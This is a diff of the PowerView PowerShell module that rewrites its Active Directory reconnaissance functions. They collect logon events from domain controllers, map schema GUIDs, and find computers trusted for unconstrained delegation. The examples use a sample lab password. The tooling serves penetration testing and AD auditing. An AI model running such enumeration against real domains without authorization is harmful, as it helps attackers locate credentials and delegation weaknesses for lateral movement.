- .PARAMETER DomainController
+.PARAMETER EndTime
- Domain controller to reflect LDAP queries through.
+The [DateTime] object representing the end of when to collect events.
+Default of [DateTime]::Now.
- .PARAMETER PageSize
+.PARAMETER MaxEvents
- The PageSize to set for the LDAP searcher object.
+The maximum number of events to retrieve. Default of 5000.
- .PARAMETER Credential
+.PARAMETER Credential
- A [Management.Automation.PSCredential] object of alternate credentials
- for connection to the target domain.
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target computer.
- .EXAMPLE
+.EXAMPLE
- PS C:\> Get-UserProperty -Domain testing
-
- Returns all user properties for users in the 'testing' domain.
+Get-DomainUserEvent
- .EXAMPLE
+Return logon events on the local machine.
- PS C:\> Get-UserProperty -Properties ssn,lastlogon,location
-
- Returns all an array of user/ssn/lastlogin/location combinations
- for users in the current domain.
+.EXAMPLE
- .LINK
+Get-DomainController | Get-DomainUserEvent -StartTime ([DateTime]::Now.AddDays(-3))
- http://obscuresecurity.blogspot.com/2014/04/ADSISearcher.html
+Return all logon events from the last 3 days from every domain controller in the current domain.
+
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainUserEvent -ComputerName PRIMARY.testlab.local -Credential $Cred -MaxEvents 1000
+
+Return a max of 1000 logon events from the specified machine using the specified alternate credentials.
+
+.OUTPUTS
+
+PowerView.LogonEvent
+
+PowerView.ExplicitCredentialLogonEvent
+
+.LINK
+
+http://www.sixdub.net/2014/11/07/offensive-event-parsing-bringing-home-trophies/
#>
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+ [OutputType('PowerView.LogonEvent')]
+ [OutputType('PowerView.ExplicitCredentialLogonEvent')]
[CmdletBinding()]
- param(
+ Param(
+ [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [Alias('dnshostname', 'HostName', 'name')]
+ [ValidateNotNullOrEmpty()]
[String[]]
- $Properties,
+ $ComputerName = $Env:COMPUTERNAME,
- [String]
- $Domain,
-
- [String]
- $DomainController,
+ [ValidateNotNullOrEmpty()]
+ [DateTime]
+ $StartTime = [DateTime]::Now.AddDays(-1),
- [ValidateRange(1,10000)]
+ [ValidateNotNullOrEmpty()]
+ [DateTime]
+ $EndTime = [DateTime]::Now,
+
+ [ValidateRange(1, 1000000)]
[Int]
- $PageSize = 200,
+ $MaxEvents = 5000,
[Management.Automation.PSCredential]
- $Credential
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty
)
- if($Properties) {
- # extract out the set of all properties for each object
- $Properties = ,"name" + $Properties
- Get-NetUser -Domain $Domain -DomainController $DomainController -PageSize $PageSize -Credential $Credential | Select-Object -Property $Properties
+ BEGIN {
+ # the XML filter we're passing to Get-WinEvent
+ $XPathFilter = @"
+<QueryList>
+ <Query Id="0" Path="Security">
+
+ <!-- Logon events -->
+ <Select Path="Security">
+ *[
+ System[
+ Provider[
+ @Name='Microsoft-Windows-Security-Auditing'
+ ]
+ and (Level=4 or Level=0) and (EventID=4624)
+ and TimeCreated[
+ @SystemTime&gt;='$($StartTime.ToUniversalTime().ToString('s'))' and @SystemTime&lt;='$($EndTime.ToUniversalTime().ToString('s'))'
+ ]
+ ]
+ ]
+ and
+ *[EventData[Data[@Name='TargetUserName'] != 'ANONYMOUS LOGON']]
+ </Select>
+
+ <!-- Logon with explicit credential events -->
+ <Select Path="Security">
+ *[
+ System[
+ Provider[
+ @Name='Microsoft-Windows-Security-Auditing'
+ ]
+ and (Level=4 or Level=0) and (EventID=4648)
+ and TimeCreated[
+ @SystemTime&gt;='$($StartTime.ToUniversalTime().ToString('s'))' and @SystemTime&lt;='$($EndTime.ToUniversalTime().ToString('s'))'
+ ]
+ ]
+ ]
+ </Select>
+
+ <Suppress Path="Security">
+ *[
+ System[
+ Provider[
+ @Name='Microsoft-Windows-Security-Auditing'
+ ]
+ and
+ (Level=4 or Level=0) and (EventID=4624 or EventID=4625 or EventID=4634)
+ ]
+ ]
+ and
+ *[
+ EventData[
+ (
+ (Data[@Name='LogonType']='5' or Data[@Name='LogonType']='0')
+ or
+ Data[@Name='TargetUserName']='ANONYMOUS LOGON'
+ or
+ Data[@Name='TargetUserSID']='S-1-5-18'
+ )
+ ]
+ ]
+ </Suppress>
+ </Query>
+</QueryList>
+"@
+ $EventArguments = @{
+ 'FilterXPath' = $XPathFilter
+ 'LogName' = 'Security'
+ 'MaxEvents' = $MaxEvents
+ }
+ if ($PSBoundParameters['Credential']) { $EventArguments['Credential'] = $Credential }
}
- else {
- # extract out just the property names
- Get-NetUser -Domain $Domain -DomainController $DomainController -PageSize $PageSize -Credential $Credential | Select-Object -First 1 | Get-Member -MemberType *Property | Select-Object -Property 'Name'
+
+ PROCESS {
+ ForEach ($Computer in $ComputerName) {
+
+ $EventArguments['ComputerName'] = $Computer
+
+ Get-WinEvent @EventArguments| ForEach-Object {
+ $Event = $_
+ $Properties = $Event.Properties
+ Switch ($Event.Id) {
+ # logon event
+ 4624 {
+ # skip computer logons, for now...
+ if(-not $Properties[5].Value.EndsWith('$')) {
+ $Output = New-Object PSObject -Property @{
+ ComputerName = $Computer
+ TimeCreated = $Event.TimeCreated
+ EventId = $Event.Id
+ SubjectUserSid = $Properties[0].Value.ToString()
+ SubjectUserName = $Properties[1].Value
+ SubjectDomainName = $Properties[2].Value
+ SubjectLogonId = $Properties[3].Value
+ TargetUserSid = $Properties[4].Value.ToString()
+ TargetUserName = $Properties[5].Value
+ TargetDomainName = $Properties[6].Value
+ TargetLogonId = $Properties[7].Value
+ LogonType = $Properties[8].Value
+ LogonProcessName = $Properties[9].Value
+ AuthenticationPackageName = $Properties[10].Value
+ WorkstationName = $Properties[11].Value
+ LogonGuid = $Properties[12].Value
+ TransmittedServices = $Properties[13].Value
+ LmPackageName = $Properties[14].Value
+ KeyLength = $Properties[15].Value
+ ProcessId = $Properties[16].Value
+ ProcessName = $Properties[17].Value
+ IpAddress = $Properties[18].Value
+ IpPort = $Properties[19].Value
+ ImpersonationLevel = $Properties[20].Value
+ RestrictedAdminMode = $Properties[21].Value
+ TargetOutboundUserName = $Properties[22].Value
+ TargetOutboundDomainName = $Properties[23].Value
+ VirtualAccount = $Properties[24].Value
+ TargetLinkedLogonId = $Properties[25].Value
+ ElevatedToken = $Properties[26].Value
+ }
+ $Output.PSObject.TypeNames.Insert(0, 'PowerView.LogonEvent')
+ $Output
+ }
+ }
+
+ # logon with explicit credential
+ 4648 {
+ # skip computer logons, for now...
+ if((-not $Properties[5].Value.EndsWith('$')) -and ($Properties[11].Value -match 'taskhost\.exe')) {
+ $Output = New-Object PSObject -Property @{
+ ComputerName = $Computer
+ TimeCreated = $Event.TimeCreated
+ EventId = $Event.Id
+ SubjectUserSid = $Properties[0].Value.ToString()
+ SubjectUserName = $Properties[1].Value
+ SubjectDomainName = $Properties[2].Value
+ SubjectLogonId = $Properties[3].Value
+ LogonGuid = $Properties[4].Value.ToString()
+ TargetUserName = $Properties[5].Value
+ TargetDomainName = $Properties[6].Value
+ TargetLogonGuid = $Properties[7].Value
+ TargetServerName = $Properties[8].Value
+ TargetInfo = $Properties[9].Value
+ ProcessId = $Properties[10].Value
+ ProcessName = $Properties[11].Value
+ IpAddress = $Properties[12].Value
+ IpPort = $Properties[13].Value
+ }
+ $Output.PSObject.TypeNames.Insert(0, 'PowerView.ExplicitCredentialLogonEvent')
+ $Output
+ }
+ }
+ default {
+ Write-Warning "No handler exists for event ID: $($Event.Id)"
+ }
+ }
+ }
+ }
}
}
-filter Find-UserField {
+function Get-DomainGUIDMap {
<#
- .SYNOPSIS
+.SYNOPSIS
+
+Helper to build a hash table of [GUID] -> resolved names for the current or specified Domain.
- Searches user object fields for a given word (default *pass*). Default
- field being searched is 'description'.
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainSearcher, Get-Forest
- Taken directly from @obscuresec's post:
- http://obscuresecurity.blogspot.com/2014/04/ADSISearcher.html
+.DESCRIPTION
- .PARAMETER SearchTerm
+Searches the forest schema location (CN=Schema,CN=Configuration,DC=testlab,DC=local) for
+all objects with schemaIDGUID set and translates the GUIDs discovered to human-readable names.
+Then searches the extended rights location (CN=Extended-Rights,CN=Configuration,DC=testlab,DC=local)
+for objects where objectClass=controlAccessRight, translating the GUIDs again.
- Term to search for, default of "pass".
+Heavily adapted from http://blogs.technet.com/b/ashleymcglone/archive/2013/03/25/active-directory-ou-permissions-report-free-powershell-script-download.aspx
- .PARAMETER SearchField
+.PARAMETER Domain
- User field to search, default of "description".
+Specifies the domain to use for the query, defaults to the current domain.
- .PARAMETER ADSpath
+.PARAMETER Server
- The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
- Useful for OU queries.
+Specifies an Active Directory server (domain controller) to bind to.
- .PARAMETER Domain
+.PARAMETER ResultPageSize
- Domain to search computer fields for, defaults to the current domain.
+Specifies the PageSize to set for the LDAP searcher object.
- .PARAMETER DomainController
+.PARAMETER ServerTimeLimit
- Domain controller to reflect LDAP queries through.
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
- .PARAMETER PageSize
+.PARAMETER Credential
- The PageSize to set for the LDAP searcher object.
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
- .PARAMETER Credential
+.OUTPUTS
- A [Management.Automation.PSCredential] object of alternate credentials
- for connection to the target domain.
+Hashtable
- .EXAMPLE
+Ouputs a hashtable containing a GUID -> Readable Name mapping.
- PS C:\> Find-UserField -SearchField info -SearchTerm backup
+.LINK
- Find user accounts with "backup" in the "info" field.
+http://blogs.technet.com/b/ashleymcglone/archive/2013/03/25/active-directory-ou-permissions-report-free-powershell-script-download.aspx
#>
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+ [OutputType([Hashtable])]
[CmdletBinding()]
- param(
- [Parameter(Position=0,ValueFromPipeline=$True)]
- [String]
- $SearchTerm = 'pass',
-
- [String]
- $SearchField = 'description',
-
- [String]
- $ADSpath,
-
+ Param (
+ [ValidateNotNullOrEmpty()]
[String]
$Domain,
+ [ValidateNotNullOrEmpty()]
+ [Alias('DomainController')]
[String]
- $DomainController,
+ $Server,
- [ValidateRange(1,10000)]
+ [ValidateRange(1, 10000)]
+ [Int]
+ $ResultPageSize = 200,
+
+ [ValidateRange(1, 10000)]
[Int]
- $PageSize = 200,
+ $ServerTimeLimit,
[Management.Automation.PSCredential]
- $Credential
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty
)
-
- Get-NetUser -ADSpath $ADSpath -Domain $Domain -DomainController $DomainController -Credential $Credential -Filter "($SearchField=*$SearchTerm*)" -PageSize $PageSize | Select-Object samaccountname,$SearchField
+
+ $GUIDs = @{'00000000-0000-0000-0000-000000000000' = 'All'}
+
+ $ForestArguments = @{}
+ if ($PSBoundParameters['Credential']) { $ForestArguments['Credential'] = $Credential }
+
+ try {
+ $SchemaPath = (Get-Forest @ForestArguments).schema.name
+ }
+ catch {
+ throw '[Get-DomainGUIDMap] Error in retrieving forest schema path from Get-Forest'
+ }
+ if (-not $SchemaPath) {
+ throw '[Get-DomainGUIDMap] Error in retrieving forest schema path from Get-Forest'
+ }
+
+ $SearcherArguments = @{
+ 'SearchBase' = $SchemaPath
+ 'LDAPFilter' = '(schemaIDGUID=*)'
+ }
+ if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }
+ if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
+ if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }
+ if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+ if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
+ $SchemaSearcher = Get-DomainSearcher @SearcherArguments
+
+ if ($SchemaSearcher) {
+ try {
+ $Results = $SchemaSearcher.FindAll()
+ $Results | Where-Object {$_} | ForEach-Object {
+ $GUIDs[(New-Object Guid (,$_.properties.schemaidguid[0])).Guid] = $_.properties.name[0]
+ }
+ if ($Results) {
+ try { $Results.dispose() }
+ catch {
+ Write-Verbose "[Get-DomainGUIDMap] Error disposing of the Results object: $_"
+ }
+ }
+ $SchemaSearcher.dispose()
+ }
+ catch {
+ Write-Verbose "[Get-DomainGUIDMap] Error in building GUID map: $_"
+ }
+ }
+
+ $SearcherArguments['SearchBase'] = $SchemaPath.replace('Schema','Extended-Rights')
+ $SearcherArguments['LDAPFilter'] = '(objectClass=controlAccessRight)'
+ $RightsSearcher = Get-DomainSearcher @SearcherArguments
+
+ if ($RightsSearcher) {
+ try {
+ $Results = $RightsSearcher.FindAll()
+ $Results | Where-Object {$_} | ForEach-Object {
+ $GUIDs[$_.properties.rightsguid[0].toString()] = $_.properties.name[0]
+ }
+ if ($Results) {
+ try { $Results.dispose() }
+ catch {
+ Write-Verbose "[Get-DomainGUIDMap] Error disposing of the Results object: $_"
+ }
+ }
+ $RightsSearcher.dispose()
+ }
+ catch {
+ Write-Verbose "[Get-DomainGUIDMap] Error in building GUID map: $_"
+ }
+ }
+
+ $GUIDs
}
-filter Get-UserEvent {
+function Get-DomainComputer {
<#
- .SYNOPSIS
+.SYNOPSIS
- Dump and parse security events relating to an account logon (ID 4624)
- or a TGT request event (ID 4768). Intended to be used and tested on
- Windows 2008 Domain Controllers.
- Admin Reqd? YES
+Return all computers or specific computer objects in AD.
- Author: @sixdub
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty
- .PARAMETER ComputerName
+.DESCRIPTION
- The computer to get events from. Default: Localhost
+Builds a directory searcher object using Get-DomainSearcher, builds a custom
+LDAP filter based on targeting/filter parameters, and searches for all objects
+matching the criteria. To only return specific properties, use
+"-Properties samaccountname,usnchanged,...". By default, all computer objects for
+the current domain are returned.
- .PARAMETER EventType
+.PARAMETER Identity
- Either 'logon', 'tgt', or 'all'. Defaults: 'logon'
+A SamAccountName (e.g. WINDOWS10$), DistinguishedName (e.g. CN=WINDOWS10,CN=Computers,DC=testlab,DC=local),
+SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1124), GUID (e.g. 4f16b6bc-7010-4cbf-b628-f3cfe20f6994),
+or a dns host name (e.g. windows10.testlab.local). Wildcards accepted.
- .PARAMETER DateStart
+.PARAMETER UACFilter
- Filter out all events before this date. Default: 5 days
+Dynamic parameter that accepts one or more values from $UACEnum, including
+"NOT_X" negation forms. To see all possible values, run '0|ConvertFrom-UACValue -ShowAll'.
- .PARAMETER Credential
+.PARAMETER Unconstrained
- A [Management.Automation.PSCredential] object of alternate credentials
- for connection to the target domain.
+Switch. Return computer objects that have unconstrained delegation.
- .EXAMPLE
+.PARAMETER TrustedToAuth
- PS C:\> Get-UserEvent -ComputerName DomainController.testlab.local
+Switch. Return computer objects that are trusted to authenticate for other principals.
- .LINK
+.PARAMETER Printers
- http://www.sixdub.net/2014/11/07/offensive-event-parsing-bringing-home-trophies/
-#>
+Switch. Return only printers.
- Param(
- [Parameter(ValueFromPipeline=$True)]
- [String]
- $ComputerName = $Env:ComputerName,
+.PARAMETER SPN
- [String]
- [ValidateSet("logon","tgt","all")]
- $EventType = "logon",
+Return computers with a specific service principal name, wildcards accepted.
- [DateTime]
- $DateStart = [DateTime]::Today.AddDays(-5),
+.PARAMETER OperatingSystem
- [Management.Automation.PSCredential]
- $Credential
- )
+Return computers with a specific operating system, wildcards accepted.
- if($EventType.ToLower() -like "logon") {
- [Int32[]]$ID = @(4624)
- }
- elseif($EventType.ToLower() -like "tgt") {
- [Int32[]]$ID = @(4768)
- }
- else {
- [Int32[]]$ID = @(4624, 4768)
- }
+.PARAMETER ServicePack
- if($Credential) {
- Write-Verbose "Using alternative credentials"
- $Arguments = @{
- 'ComputerName' = $ComputerName;
- 'Credential' = $Credential;
- 'FilterHashTable' = @{ LogName = 'Security'; ID=$ID; StartTime=$DateStart};
- 'ErrorAction' = 'SilentlyContinue';
- }
- }
- else {
- $Arguments = @{
- 'ComputerName' = $ComputerName;
- 'FilterHashTable' = @{ LogName = 'Security'; ID=$ID; StartTime=$DateStart};
- 'ErrorAction' = 'SilentlyContinue';
- }
- }
+Return computers with a specific service pack, wildcards accepted.
- # grab all events matching our filter for the specified host
- Get-WinEvent @Arguments | ForEach-Object {
+.PARAMETER SiteName
- if($ID -contains 4624) {
- # first parse and check the logon event type. This could be later adapted and tested for RDP logons (type 10)
- if($_.message -match '(?s)(?<=Logon Type:).*?(?=(Impersonation Level:|New Logon:))') {
- if($Matches) {
- $LogonType = $Matches[0].trim()
- $Matches = $Null
- }
- }
- else {
- $LogonType = ""
- }
+Return computers in the specific AD Site name, wildcards accepted.
- # interactive logons or domain logons
- if (($LogonType -eq 2) -or ($LogonType -eq 3)) {
- try {
- # parse and store the account used and the address they came from
- if($_.message -match '(?s)(?<=New Logon:).*?(?=Process Information:)') {
- if($Matches) {
- $UserName = $Matches[0].split("`n")[2].split(":")[1].trim()
- $Domain = $Matches[0].split("`n")[3].split(":")[1].trim()
- $Matches = $Null
- }
- }
- if($_.message -match '(?s)(?<=Network Information:).*?(?=Source Port:)') {
- if($Matches) {
- $Address = $Matches[0].split("`n")[2].split(":")[1].trim()
- $Matches = $Null
- }
- }
+.PARAMETER Ping
- # only add if there was account information not for a machine or anonymous logon
- if ($UserName -and (-not $UserName.endsWith('$')) -and ($UserName -ne 'ANONYMOUS LOGON')) {
- $LogonEventProperties = @{
- 'Domain' = $Domain
- 'ComputerName' = $ComputerName
- 'Username' = $UserName
- 'Address' = $Address
- 'ID' = '4624'
- 'LogonType' = $LogonType
- 'Time' = $_.TimeCreated
- }
- New-Object -TypeName PSObject -Property $LogonEventProperties
- }
- }
- catch {
- Write-Verbose "Error parsing event logs: $_"
- }
- }
- }
- if($ID -contains 4768) {
- # the TGT event type
- try {
- if($_.message -match '(?s)(?<=Account Information:).*?(?=Service Information:)') {
- if($Matches) {
- $Username = $Matches[0].split("`n")[1].split(":")[1].trim()
- $Domain = $Matches[0].split("`n")[2].split(":")[1].trim()
- $Matches = $Null
- }
- }
+Switch. Ping each host to ensure it's up before enumerating.
- if($_.message -match '(?s)(?<=Network Information:).*?(?=Additional Information:)') {
- if($Matches) {
- $Address = $Matches[0].split("`n")[1].split(":")[-1].trim()
- $Matches = $Null
- }
- }
+.PARAMETER Domain
- $LogonEventProperties = @{
- 'Domain' = $Domain
- 'ComputerName' = $ComputerName
- 'Username' = $UserName
- 'Address' = $Address
- 'ID' = '4768'
- 'LogonType' = ''
- 'Time' = $_.TimeCreated
- }
+Specifies the domain to use for the query, defaults to the current domain.
- New-Object -TypeName PSObject -Property $LogonEventProperties
- }
- catch {
- Write-Verbose "Error parsing event logs: $_"
- }
- }
- }
-}
+.PARAMETER LDAPFilter
+Specifies an LDAP query string that is used to filter Active Directory objects.
-function Get-ObjectAcl {
-<#
- .SYNOPSIS
- Returns the ACLs associated with a specific active directory object.
+.PARAMETER Properties
+
+Specifies the properties of the output object to retrieve from the server.
- Thanks Sean Metcalf (@pyrotek3) for the idea and guidance.
+.PARAMETER SearchBase
- .PARAMETER SamAccountName
+The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
- Object name to filter for.
+.PARAMETER Server
- .PARAMETER Name
+Specifies an Active Directory server (domain controller) to bind to.
- Object name to filter for.
+.PARAMETER SearchScope
- .PARAMETER DistinguishedName
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
- Object distinguished name to filter for.
+.PARAMETER ResultPageSize
- .PARAMETER ResolveGUIDs
+Specifies the PageSize to set for the LDAP searcher object.
- Switch. Resolve GUIDs to their display names.
+.PARAMETER ServerTimeLimit
- .PARAMETER Filter
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
- A customized ldap filter string to use, e.g. "(description=*admin*)"
-
- .PARAMETER ADSpath
+.PARAMETER SecurityMasks
- The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
- Useful for OU queries.
+Specifies an option for examining security information of a directory object.
+One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.
- .PARAMETER ADSprefix
+.PARAMETER Tombstone
- Prefix to set for the searcher (like "CN=Sites,CN=Configuration")
+Switch. Specifies that the searcher should also return deleted/tombstoned objects.
- .PARAMETER RightsFilter
+.PARAMETER FindOne
- Only return results with the associated rights, "All", "ResetPassword","WriteMembers"
+Only return one result object.
- .PARAMETER Domain
+.PARAMETER Credential
- The domain to use for the query, defaults to the current domain.
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
- .PARAMETER DomainController
+.PARAMETER Raw
- Domain controller to reflect LDAP queries through.
+Switch. Return raw results instead of translating the fields into a custom PSObject.
- .PARAMETER PageSize
+.EXAMPLE
- The PageSize to set for the LDAP searcher object.
+Get-DomainComputer
- .EXAMPLE
+Returns the current computers in current domain.
- PS C:\> Get-ObjectAcl -SamAccountName matt.admin -domain testlab.local
-
- Get the ACLs for the matt.admin user in the testlab.local domain
+.EXAMPLE
- .EXAMPLE
+Get-DomainComputer -SPN mssql* -Domain testlab.local
- PS C:\> Get-ObjectAcl -SamAccountName matt.admin -domain testlab.local -ResolveGUIDs
-
- Get the ACLs for the matt.admin user in the testlab.local domain and
- resolve relevant GUIDs to their display names.
+Returns all MS SQL servers in the testlab.local domain.
- .EXAMPLE
+.EXAMPLE
- PS C:\> Get-NetOU -FullData | Get-ObjectAcl -ResolveGUIDs
+Get-DomainComputer -UACFilter TRUSTED_FOR_DELEGATION,SERVER_TRUST_ACCOUNT -Properties dnshostname
- Enumerate the ACL permissions for all OUs in the domain.
+Return the dns hostnames of servers trusted for delegation.
+
+.EXAMPLE
+
+Get-DomainComputer -SearchBase "LDAP://OU=secret,DC=testlab,DC=local" -Unconstrained
+
+Search the specified OU for computeres that allow unconstrained delegation.
+
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainComputer -Credential $Cred
+
+.OUTPUTS
+
+PowerView.Computer
+
+Custom PSObject with translated computer property fields.
+
+PowerView.Computer.Raw
+
+The raw DirectoryServices.SearchResult object, if -Raw is enabled.
#>
+ [OutputType('PowerView.Computer')]
+ [OutputType('PowerView.Computer.Raw')]
[CmdletBinding()]
Param (
- [Parameter(ValueFromPipelineByPropertyName=$True)]
+ [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [Alias('SamAccountName', 'Name', 'DNSHostName')]
+ [String[]]
+ $Identity,
+
+ [Switch]
+ $Unconstrained,
+
+ [Switch]
+ $TrustedToAuth,
+
+ [Switch]
+ $Printers,
+
+ [ValidateNotNullOrEmpty()]
+ [Alias('ServicePrincipalName')]
[String]
- $SamAccountName,
+ $SPN,
- [Parameter(ValueFromPipelineByPropertyName=$True)]
+ [ValidateNotNullOrEmpty()]
[String]
- $Name = "*",
+ $OperatingSystem,
- [Parameter(ValueFromPipelineByPropertyName=$True)]
+ [ValidateNotNullOrEmpty()]
+ [String]
+ $ServicePack,
+
+ [ValidateNotNullOrEmpty()]
[String]
- $DistinguishedName = "*",
+ $SiteName,
[Switch]
- $ResolveGUIDs,
+ $Ping,
+ [ValidateNotNullOrEmpty()]
[String]
- $Filter,
+ $Domain,
+ [ValidateNotNullOrEmpty()]
+ [Alias('Filter')]
[String]
- $ADSpath,
+ $LDAPFilter,
- [String]
- $ADSprefix,
+ [ValidateNotNullOrEmpty()]
+ [String[]]
+ $Properties,
+ [ValidateNotNullOrEmpty()]
+ [Alias('ADSPath')]
[String]
- [ValidateSet("All","ResetPassword","WriteMembers")]
- $RightsFilter,
+ $SearchBase,
+ [ValidateNotNullOrEmpty()]
+ [Alias('DomainController')]
[String]
- $Domain,
+ $Server,
+ [ValidateSet('Base', 'OneLevel', 'Subtree')]
[String]
- $DomainController,
+ $SearchScope = 'Subtree',
- [ValidateRange(1,10000)]
+ [ValidateRange(1, 10000)]
[Int]
- $PageSize = 200
+ $ResultPageSize = 200,
+
+ [ValidateRange(1, 10000)]
+ [Int]
+ $ServerTimeLimit,
+
+ [ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')]
+ [String]
+ $SecurityMasks,
+
+ [Switch]
+ $Tombstone,
+
+ [Alias('ReturnOne')]
+ [Switch]
+ $FindOne,
+
+ [Management.Automation.PSCredential]
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty,
+
+ [Switch]
+ $Raw
)
- begin {
- $Searcher = Get-DomainSearcher -Domain $Domain -DomainController $DomainController -ADSpath $ADSpath -ADSprefix $ADSprefix -PageSize $PageSize
+ DynamicParam {
+ $UACValueNames = [Enum]::GetNames($UACEnum)
+ # add in the negations
+ $UACValueNames = $UACValueNames | ForEach-Object {$_; "NOT_$_"}
+ # create new dynamic parameter
+ New-DynamicParameter -Name UACFilter -ValidateSet $UACValueNames -Type ([array])
+ }
- # get a GUID -> name mapping
- if($ResolveGUIDs) {
- $GUIDs = Get-GUIDMap -Domain $Domain -DomainController $DomainController -PageSize $PageSize
- }
+ BEGIN {
+ $SearcherArguments = @{}
+ if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }
+ if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties }
+ if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }
+ if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
+ if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }
+ if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }
+ if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+ if ($PSBoundParameters['SecurityMasks']) { $SearcherArguments['SecurityMasks'] = $SecurityMasks }
+ if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }
+ if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
+ $CompSearcher = Get-DomainSearcher @SearcherArguments
}
- process {
+ PROCESS {
+ #bind dynamic parameter to a friendly variable
+ if ($PSBoundParameters -and ($PSBoundParameters.Count -ne 0)) {
+ New-DynamicParameter -CreateVariables -BoundParameters $PSBoundParameters
+ }
- if ($Searcher) {
+ if ($CompSearcher) {
+ $IdentityFilter = ''
+ $Filter = ''
+ $Identity | Where-Object {$_} | ForEach-Object {
+ $IdentityInstance = $_.Replace('(', '\28').Replace(')', '\29')
+ if ($IdentityInstance -match '^S-1-') {
+ $IdentityFilter += "(objectsid=$IdentityInstance)"
+ }
+ elseif ($IdentityInstance -match '^CN=') {
+ $IdentityFilter += "(distinguishedname=$IdentityInstance)"
+ if ((-not $PSBoundParameters['Domain']) -and (-not $PSBoundParameters['SearchBase'])) {
+ # if a -Domain isn't explicitly set, extract the object domain out of the distinguishedname
+ # and rebuild the domain searcher
+ $IdentityDomain = $IdentityInstance.SubString($IdentityInstance.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'
+ Write-Verbose "[Get-DomainComputer] Extracted domain '$IdentityDomain' from '$IdentityInstance'"
+ $SearcherArguments['Domain'] = $IdentityDomain
+ $CompSearcher = Get-DomainSearcher @SearcherArguments
+ if (-not $CompSearcher) {
+ Write-Warning "[Get-DomainComputer] Unable to retrieve domain searcher for '$IdentityDomain'"
+ }
+ }
+ }
+ elseif ($IdentityInstance.Contains('.')) {
+ $IdentityFilter += "(|(name=$IdentityInstance)(dnshostname=$IdentityInstance))"
+ }
+ elseif ($IdentityInstance -imatch '^[0-9A-F]{8}-([0-9A-F]{4}-){3}[0-9A-F]{12}$') {
+ $GuidByteString = (([Guid]$IdentityInstance).ToByteArray() | ForEach-Object { '\' + $_.ToString('X2') }) -join ''
+ $IdentityFilter += "(objectguid=$GuidByteString)"
+ }
+ else {
+ $IdentityFilter += "(name=$IdentityInstance)"
+ }
+ }
+ if ($IdentityFilter -and ($IdentityFilter.Trim() -ne '') ) {
+ $Filter += "(|$IdentityFilter)"
+ }
- if($SamAccountName) {
- $Searcher.filter="(&(samaccountname=$SamAccountName)(name=$Name)(distinguishedname=$DistinguishedName)$Filter)"
+ if ($PSBoundParameters['Unconstrained']) {
+ Write-Verbose '[Get-DomainComputer] Searching for computers with for unconstrained delegation'
+ $Filter += '(userAccountControl:1.2.840.113556.1.4.803:=524288)'
}
- else {
- $Searcher.filter="(&(name=$Name)(distinguishedname=$DistinguishedName)$Filter)"
+ if ($PSBoundParameters['TrustedToAuth']) {
+ Write-Verbose '[Get-DomainComputer] Searching for computers that are trusted to authenticate for other principals'
+ $Filter += '(msds-allowedtodelegateto=*)'
+ }
+ if ($PSBoundParameters['Printers']) {
+ Write-Verbose '[Get-DomainComputer] Searching for printers'
+ $Filter += '(objectCategory=printQueue)'
+ }
+ if ($PSBoundParameters['SPN']) {
+ Write-Verbose "[Get-DomainComputer] Searching for computers with SPN: $SPN"
+ $Filter += "(servicePrincipalName=$SPN)"
+ }
+ if ($PSBoundParameters['OperatingSystem']) {
+ Write-Verbose "[Get-DomainComputer] Searching for computers with operating system: $OperatingSystem"
+ $Filter += "(operatingsystem=$OperatingSystem)"
+ }
+ if ($PSBoundParameters['ServicePack']) {
+ Write-Verbose "[Get-DomainComputer] Searching for computers with service pack: $ServicePack"
